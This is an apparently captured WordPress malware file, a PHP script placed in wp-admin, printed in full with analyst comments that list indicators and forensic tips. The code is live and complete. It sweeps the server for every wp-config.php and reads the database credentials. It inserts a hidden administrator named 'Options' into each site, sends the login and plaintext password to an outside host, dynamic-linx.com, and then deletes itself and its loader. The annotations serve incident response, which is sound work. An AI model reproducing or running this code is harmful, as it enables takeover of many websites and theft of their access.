Current File : /homepages/42/d735459332/htdocs/eliminamostusdeudas/wp-admin/wp-control-final-dg.php |
<?php
// Walks upward from $directory, one parent at a time, and returns the path of
// the first wp-config.php found; returns false when the walk reaches '/'.
// Analyst note: pachamama() calls this to locate the config file whose
// database credentials parse_wp_config() then reads.
function check_wp_config($directory) {
while ($directory !== '/') {
$wp_config_file = $directory . '/wp-config.php';
if (file_exists($wp_config_file)) {
return $wp_config_file;
}
// Not here: step up to the parent directory and try again
$directory = dirname($directory);
}
return false;
}
// Reads a wp-config.php file as text and extracts, by regex, the table prefix
// and the DB_NAME / DB_USER / DB_PASSWORD / DB_HOST constants.
// Returns an array with keys 'prefix', 'database', 'username', 'password', 'host'.
// Calls die() (ending the whole run) if the file is missing or no prefix is found.
// Responder note: every site whose wp-config.php this script could read has had
// its database credentials read by attacker-controlled code. The visible code
// uses them only for the local connection in access_database() and does not put
// them in the outbound POST in pachamama(); rotating them is still prudent.
// Keeping wp-config.php unreadable across account or site boundaries limits
// how far a single compromised site can reach.
function parse_wp_config($config_file) {
if (file_exists($config_file)) {
$config_content = file_get_contents($config_file);
$matches = [];
// Extract prefix (two patterns are tried in turn; the second is the looser one)
if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
$prefix = $matches[1];
} else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
$prefix = $matches[1];
} else {
die("Prefix not found in wp-config.php");
}
// Extract database name
if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$database = $matches[1];
}
// Extract username
if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$username = $matches[1];
}
// Extract password (held in memory in plaintext from here on)
if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$password = $matches[1];
}
// Extract host
if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$host = $matches[1];
} else {
$host = 'localhost'; // Assuming local host if not specified
}
return array(
'prefix' => $prefix,
'database' => $database,
'username' => $username,
'password' => $password,
'host' => $host
);
} else {
die("wp-config.php file not found");
}
}
// Opens a mysqli connection using the host, username, password and database
// taken from the array built by parse_wp_config().
// Returns the mysqli handle on success, false on connection error, and echoes
// a SUCCESS/FAIL status line either way.
// Detection note: the connection is made with the site's own database account,
// so at the database layer it is not distinguishable by username from normal
// WordPress traffic; the rows it writes (see add_admin_user) are the artefact.
function access_database($config) {
$mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
if ($mysqli->connect_errno) {
echo "DATABASE ACCESS [FAIL]\n";
return false;
} else {
echo "DATABASE ACCESS [SUCCESS]\n";
return $mysqli;
}
}
// Builds a string of $length characters (default 12) by picking positions in a
// fixed alphabet of digits, ASCII letters and the punctuation "!@#$%^&*()-_"
// with rand(). Returns the resulting string.
// In this file the result becomes the plaintext password of the rogue account.
function generate_random_password($length = 12) {
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
$password = '';
$characters_length = strlen($characters);
for ($i = 0; $i < $length; $i++) {
$password .= $characters[rand(0, $characters_length - 1)];
}
return $password;
}
// Define a global variable for the password.
// Scoping note for incident response: the password is generated once per run
// and read back through `global` / $GLOBALS below, so every site processed in
// the same execution receives the same account password.
$generated_password = generate_random_password();
// Inserts a WordPress account named 'Options' directly into the database and
// grants it the administrator role. Returns nothing; progress is echoed.
//   $mysqli - open connection returned by access_database()
//   $config - array from parse_wp_config(); only 'prefix' is read here
// Indicators visible in this block (hunt for these in every database the
// script could reach):
//   - {prefix}users row with user_login = 'Options', user_nicename = 'Options',
//     user_email = 'Options@example.com'
//   - {prefix}usermeta row with meta_key = '{prefix}capabilities' and
//     meta_value = 'a:1:{s:13:"administrator";b:1;}' for that user ID
// NOTE(review): the rows are written with raw SQL rather than through
// WordPress's user API, so WordPress-level hooks or notifications for new
// users presumably never fire - confirm against the site's plugins and logs.
// NOTE(review): accounts created through WordPress normally carry further
// usermeta rows (e.g. a user_level entry); an administrator that has only a
// capabilities row is worth a look - compare with a known-good account.
function add_admin_user($mysqli, $config) {
global $generated_password; // Access the global generated password variable
$username = 'Options';
$password = $generated_password;
$user_role = 'administrator'; // assigned but not read again in this function
// Hash the password with PHP's password_hash().
// NOTE(review): the resulting hash format may differ from what the installed
// WordPress version writes for its own users - a possible hunting signal; verify.
$hashed_password = password_hash($password, PASSWORD_DEFAULT);
// Check if the user already exists (a re-run on the same site stops here)
$query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
$result = $mysqli->query($query);
if ($result && $result->num_rows > 0) {
echo "User '{$username}' already exists.\n";
} else {
// Insert the new user; user_registered is set to the database's NOW(),
// which gives a timestamp for timeline reconstruction
$query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())";
$result = $mysqli->query($query);
if ($result) {
$user_id = $mysqli->insert_id;
// Set user role: a serialized capabilities array naming 'administrator'
$query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
$result = $mysqli->query($query);
if ($result) {
echo "User '{$username}' with administrative privileges added successfully.\n";
} else {
// The users row already exists at this point even though the role insert failed
echo "Error assigning role to user '{$username}'.\n";
}
} else {
echo "Error creating user '{$username}': " . $mysqli->error . "\n";
}
}
}
// Derives a "domain" label from a filesystem path: takes the directory two
// levels above $path (for a wp-config.php path, the directory above the one
// that holds the file), and returns its last path segment if it passes
// FILTER_VALIDATE_DOMAIN with FILTER_FLAG_HOSTNAME; otherwise returns null.
// Analyst note: the value is a directory name, not a resolved hostname, so the
// "domain" reported by the callback in pachamama() may not be the site's real
// domain on hosts whose directory layout does not embed it.
function get_domain_from_path($path) {
$parent_directory = dirname(dirname($path)); // Two levels up from the wp-config.php path
$parts = explode('/', $parent_directory);
$domain = end($parts); // Get the last segment of the path
if (filter_var($domain, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME)) {
return $domain;
}
return null;
}
// Per-site routine. Given a path to (or containing) wp-config.php it:
//   1. locates the config file (check_wp_config) and parses it (parse_wp_config),
//   2. connects to the database and inserts the 'Options' administrator
//      (access_database, add_admin_user),
//   3. derives a domain label from the path and POSTs it, together with the
//      username 'Options' and the plaintext generated password, as JSON to
//      https://dynamic-linx.com/AddSites.
// Returns nothing; status lines are echoed.
// Detection notes grounded in this block:
//   - Network indicator: outbound HTTPS POST from the web server to
//     dynamic-linx.com, path /AddSites, Content-Type application/json.
//   - The POST sits outside the `if ($mysqli)` branch, so it is sent whenever a
//     domain label is derived, even if the database connection or the insert
//     failed. A callback in proxy/egress logs therefore does not by itself
//     prove the account exists; check the users table.
//   - Restricting outbound connections from PHP workers to an allow-list
//     would block this reporting step.
function pachamama($path) {
// Reduce a full wp-config.php path to its directory
if (strpos($path, '/wp-config.php') !== false) {
$path = str_replace('/wp-config.php', '', $path);
}
$current_directory = $path;
$wp_config_file = check_wp_config($current_directory);
if ($wp_config_file) {
echo "WP-CONFIG [FOUND]\n";
$config = parse_wp_config($wp_config_file);
$mysqli = access_database($config);
if ($mysqli) {
add_admin_user($mysqli, $config);
$mysqli->close();
}
$domain = get_domain_from_path($wp_config_file);
if ($domain) {
echo "[$domain] OK\n";
// Perform a POST request to https://dynamic-linx.com/AddSites
$url = 'https://dynamic-linx.com/AddSites';
$post_data = array(
'domain' => $domain,
'username' => 'Options',
'password' => $GLOBALS['generated_password'] // Access the global generated password variable
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json', // Set content type to JSON
'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
));
$response = curl_exec($ch);
$error = curl_error($ch); // Get any curl error
curl_close($ch);
// The remote response body is echoed into the script's own output
if ($response === false) {
echo "POST request failed: $error\n";
} else {
echo "POST request sent successfully. Response: $response\n";
}
}
} else {
echo "WP-CONFIG [NOT FOUND]\n";
}
}
// Entry point of the file-system sweep. Takes the current working directory,
// climbs three parent levels, and hands that directory to
// find_wp_configs_recursive(), which appends every wp-config.php path it finds
// to $wp_config_paths (passed by reference). $depth is accepted but not used.
// Scoping note: because the search root is three levels above the working
// directory, the sweep is not limited to the site that hosts this file; on
// shared hosting it can presumably reach sibling sites readable by the same
// system user. Treat every WordPress install under that root as in scope.
function find_wp_configs(&$wp_config_paths, $depth = 0) {
$current_directory = getcwd();
$parent_directory = $current_directory;
// Go back three parents
for ($i = 0; $i < 3; $i++) {
$parent_directory = dirname($parent_directory);
}
// Start the search from the parent directory
find_wp_configs_recursive($parent_directory, $wp_config_paths);
}
// Depth-first directory walk: records $directory/wp-config.php in
// $wp_config_paths (by reference) if it exists, then recurses into every
// subdirectory returned by scandir() except '.' and '..'. No depth limit is
// applied in the visible code.
// Detection note: the walk lists every directory under the search root, which
// shows up as a burst of directory reads by the PHP worker. Per-site
// filesystem isolation (separate system users, open_basedir or equivalent)
// narrows what such a walk can see.
function find_wp_configs_recursive($directory, &$wp_config_paths) {
// Check if wp-config.php exists in the current directory
$wp_config_file = $directory . '/wp-config.php';
if (file_exists($wp_config_file)) {
$wp_config_paths[] = $wp_config_file;
}
// Continue searching forward recursively
$contents = scandir($directory);
foreach ($contents as $item) {
if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
}
}
}
// Runs the same sweep as the main driver (find_wp_configs) and only echoes the
// discovered wp-config.php paths, one per line, or a "none found" message.
// It is defined here but not called anywhere in the visible listing.
function print_wp_config_paths() {
$wp_config_paths = [];
find_wp_configs($wp_config_paths);
if (empty($wp_config_paths)) {
echo "No wp-config.php files found.\n";
} else {
echo "List of wp-config.php files:\n";
foreach ($wp_config_paths as $wp_config_path) {
echo "$wp_config_path\n";
}
}
}
// Main driver, executed as soon as the file is loaded: collect every
// wp-config.php path under the search root and run pachamama() on each.
// There is no parameter, token or other condition in front of it in the
// visible code, so a single request to the file triggers the whole sequence.
// Access logs for a request to this script's path give the execution time.
$wp_config_paths = [];
find_wp_configs($wp_config_paths);
foreach ($wp_config_paths as $wp_config_path) {
pachamama($wp_config_path);
}
// Cleanup step: deletes <parent of cwd>/wp-content/plugins/init/init.php if it
// exists, then deletes the running script itself ($_SERVER['SCRIPT_FILENAME']).
// Returns nothing; each outcome is echoed.
// Forensic notes grounded in this block:
//   - The script removes itself, so its absence on disk says nothing about
//     whether it ran. Rely on web access logs, backups or file-integrity
//     history, and on the database rows written by add_admin_user().
//   - Only init.php is unlinked; the wp-content/plugins/init directory itself
//     is left in place and may remain as an artefact.
//   - NOTE(review): init.php is presumably the component that delivered or
//     launched this file - nothing in the visible code shows its contents;
//     recover it from backups if possible.
function delete_init_and_self() {
// Get the current directory
$current_directory = getcwd();
// Move to the parent directory
$parent_directory = dirname($current_directory);
// Move to wp-content/plugins/init folder
$init_directory = $parent_directory . '/wp-content/plugins/init';
// Check if init.php exists in the init directory
$init_file = $init_directory . '/init.php';
if (file_exists($init_file)) {
// Delete init.php
unlink($init_file);
echo "init.php deleted successfully.\n";
} else {
echo "init.php not found.\n";
}
// Get the path of the currently running PHP script
$current_script = $_SERVER['SCRIPT_FILENAME'];
// Delete the currently running PHP script
if (file_exists($current_script)) {
// Delete the script
unlink($current_script);
echo "Current script deleted successfully.\n";
} else {
echo "Current script not found.\n";
}
}
// Call the function to perform deletion tasks.
// This runs last, after every discovered site has been processed, so the file
// is expected to be gone from disk after a single execution.
delete_init_and_self();
?>